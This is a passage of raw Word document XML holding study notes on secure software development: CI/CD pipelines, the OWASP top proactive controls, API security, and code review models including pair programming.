    <w:p w14:paraId="4D608E79" w14:textId="2D4873C5" w:rsidR="00E83D5A" w:rsidRDefault="00E83D5A" w:rsidP="00E83D5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In CI environments,</w:t>
      </w:r>
      <w:r w:rsidR="008117E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> this can range from a few times a day to frequent check-ins and automated builds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083901F1" w14:textId="4B0EA9E5" w:rsidR="009922E9" w:rsidRDefault="009922E9" w:rsidP="009922E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main goal of this is to enable the use of automation and scripting to implement automated </w:t>
      </w:r>
      <w:r w:rsidR="003C0CE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>courses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of action that result in continuous delivery of code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23747CB0" w14:textId="7C4AF230" w:rsidR="0098504B" w:rsidRDefault="00C405A6" w:rsidP="009922E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Continuous deployment (CD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Continuous delivery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B57385">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">is often paired with continuous integration by rolling out tested changes into production automatically as soon as they have been tested. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C037B8" w14:textId="4A5E6778" w:rsidR="00AE0545" w:rsidRDefault="00711357" w:rsidP="009922E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Using continuous integration and continuous deployment methods requires building </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>continuous validation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and automated security testing into the pipeline testing process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C549861" w14:textId="5AB6E1EA" w:rsidR="00B81739" w:rsidRDefault="00B81739" w:rsidP="00B8173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It can result in new vulnerabilities being deployed into production and could allow an untrusted or rogue developer to insert flaws into the code that is deployed and then remove the code as part of a deployment in the next cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D7E0A" w14:textId="39BE7BE0" w:rsidR="00180563" w:rsidRDefault="000855EF" w:rsidP="00180563">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This means that logging, reporting, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>continuous monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> must all be designed to fit in the CI/CD process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84F4E8" w14:textId="4567234E" w:rsidR="00180563" w:rsidRDefault="00180563" w:rsidP="00180563">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Designing and Coding for Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58733FB3" w14:textId="41887C0F" w:rsidR="00180563" w:rsidRDefault="00704DCA" w:rsidP="0018056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first chance a security professional ca</w:t>
      </w:r>
      <w:r w:rsidR="00E609BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n help with software design is in the requirements gathering and design phases, so that security can be built in as a part of the required design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B49BF2B" w14:textId="6F8B7503" w:rsidR="00E609BE" w:rsidRDefault="009E45F7" w:rsidP="009E45F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Later, the development process can see secure coding techniques, code review, and testing to improve the quality and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E1353" w14:textId="157F3C86" w:rsidR="009E45F7" w:rsidRDefault="003F6D5F" w:rsidP="009E45F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During the testing phase, fully integrated software can be tested using tools like web application security scanners or pen testing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D766389" w14:textId="7B0A40C9" w:rsidR="007B218B" w:rsidRPr="007B218B" w:rsidRDefault="007B218B" w:rsidP="007B218B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B218B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Secure Coding Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE4F12C" w14:textId="4E33E811" w:rsidR="007B218B" w:rsidRDefault="00190423" w:rsidP="007B21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One of the best resources for secure coding practices is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open Web Application Security Project (OWASP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is home to a broad community of developers and security practitioners, and it hosts many community-developed standards</w:t>
      </w:r>
      <w:r w:rsidR="00F2312D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, guides, and documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59BB0D" w14:textId="02B5CADA" w:rsidR="00F2312D" w:rsidRDefault="00F2312D" w:rsidP="007B21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Their content is always updated, and </w:t>
      </w:r>
      <w:r w:rsidR="00CE071E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>has top proactive controls in 2018:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A435F6" w14:textId="235DAC0C" w:rsidR="00CE071E" w:rsidRDefault="00CE071E" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Define Security Requirements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement security throughout the development process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F50E55" w14:textId="30C91CEF" w:rsidR="00CE071E" w:rsidRDefault="00CE071E" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Leverage Security Frameworks and Libraries:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Preexisting security capabilities can make securing applications easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6060EC67" w14:textId="7A7BB91D" w:rsidR="00CE071E" w:rsidRDefault="00CE071E" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Secure Database Access:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prebuild SQL queries to prevent injection and configure databases for secure access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD27958" w14:textId="4019E88D" w:rsidR="00CE071E" w:rsidRDefault="00E2284D" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Encode and Escape Data:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remove special characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84EBC6" w14:textId="506DED00" w:rsidR="00E2284D" w:rsidRDefault="00E2284D" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Validate All Inputs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Treat user input as untrusted and filter appropriately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A0B069" w14:textId="2C03185C" w:rsidR="00E2284D" w:rsidRDefault="00A623AD" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement Digital Identity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use multifactor authentication, secure password storage and recovery, and session handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E01042" w14:textId="53200F90" w:rsidR="00A623AD" w:rsidRDefault="00405D98" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enforce Access Controls:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Require all requests to go through access control checks, deny by default, and apply the principle of least privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235F1B4" w14:textId="0AF37B02" w:rsidR="00405D98" w:rsidRDefault="00405D98" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Protect Data Everywhere:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use encryption in transit and at rest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91BD87" w14:textId="0262CF9B" w:rsidR="00405D98" w:rsidRDefault="00405D98" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement Security Logging and Monitoring:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This helps detect problems and allows investigation after the fact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843F3BD" w14:textId="57C04E31" w:rsidR="00405D98" w:rsidRDefault="00405D98" w:rsidP="00CE071E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00405D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Handle all Errors and Exceptions:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Errors should not provide sensitive data, and applications should be tested to ensure that they handle problems gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64064477" w14:textId="10776590" w:rsidR="00405D98" w:rsidRDefault="00405D98" w:rsidP="00405D98">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API Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0B1F7A" w14:textId="36DB4CAE" w:rsidR="00405D98" w:rsidRDefault="008518F4" w:rsidP="00405D98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Application programming interfaces (APIs)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are interfaces between clients and servers or applications and operating systems that define how the client should ask for information from the server and how the sever will respond. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637C6119" w14:textId="64C69065" w:rsidR="00103082" w:rsidRDefault="00930041" w:rsidP="00405D9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APIs can be a point of vulnerability, where security relies on authentication, authorization, proper data scoping to ensure that too much data isn’t released, rate limiting, input filtering, and appropriate monitoring and logging to remain secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4B3F0" w14:textId="58E50F5D" w:rsidR="00693412" w:rsidRDefault="00693412" w:rsidP="00693412">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Code Review Models:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A254F52" w14:textId="69ED202A" w:rsidR="00693412" w:rsidRDefault="000F26B4" w:rsidP="0069341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Reviewing code not only finds </w:t>
      </w:r>
      <w:r w:rsidR="00771C47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>problems but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures everyone is familiar with the code and how it works to prevent problems in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124AA219" w14:textId="7951E437" w:rsidR="000F26B4" w:rsidRDefault="00771C47" w:rsidP="0069341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However, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>code review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes exist to </w:t>
      </w:r>
      <w:r w:rsidR="00055F78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>make this process uniform:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68832AB8" w14:textId="0865E191" w:rsidR="00055F78" w:rsidRDefault="00055F78" w:rsidP="00055F78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pair Programming:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an Agile software development technique that</w:t>
      </w:r>
      <w:r w:rsidR="00FF26F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> places two developers at one workstation. One developer writes the code while the other reviews their code as it is written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BAFE55" w14:textId="200E3AD7" w:rsidR="00A81BAB" w:rsidRDefault="00A81BAB" w:rsidP="00A81BAB">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Typically, the role of the </w:t>
      </w:r>
      <w:r w:rsidR="00CD5751">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>coder and reviewer will switch often.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5EB4BC" w14:textId="2939ED87" w:rsidR="00CD5751" w:rsidRDefault="00CD5751" w:rsidP="00A81BAB">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This practice is more expensive as it takes up the time of two </w:t>
      </w:r>
      <w:r w:rsidR="00623C6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>programmers but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will generate </w:t>
      </w:r>
      <w:r w:rsidR="00623C6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>higher quality code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2866C2B0" w14:textId="7EC86FA0" w:rsidR="009A360F" w:rsidRDefault="009A360F" w:rsidP="00CD1699">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Cost: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6DF68" w14:textId="6D8FAFE4" w:rsidR="00CD1699" w:rsidRDefault="00CD1699" w:rsidP="00CD1699">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Re</w:t>
      </w:r>
      <w:r w:rsidR="009F75E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>view Occurrence: Real Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443055A" w14:textId="7DA8DC68" w:rsidR="009F75E5" w:rsidRDefault="009F75E5" w:rsidP="00CD1699">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Ability to Explain Code: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD510E" w14:textId="07387D88" w:rsidR="009F75E5" w:rsidRDefault="009F75E5" w:rsidP="00CD1699">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Skill Required: </w:t>
      </w:r>
      <w:r w:rsidR="00CA4D3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Users Must Learn to Pair Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595B916" w14:textId="7C1A0F76" w:rsidR="00623C6C" w:rsidRDefault="00623C6C" w:rsidP="00E41078">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
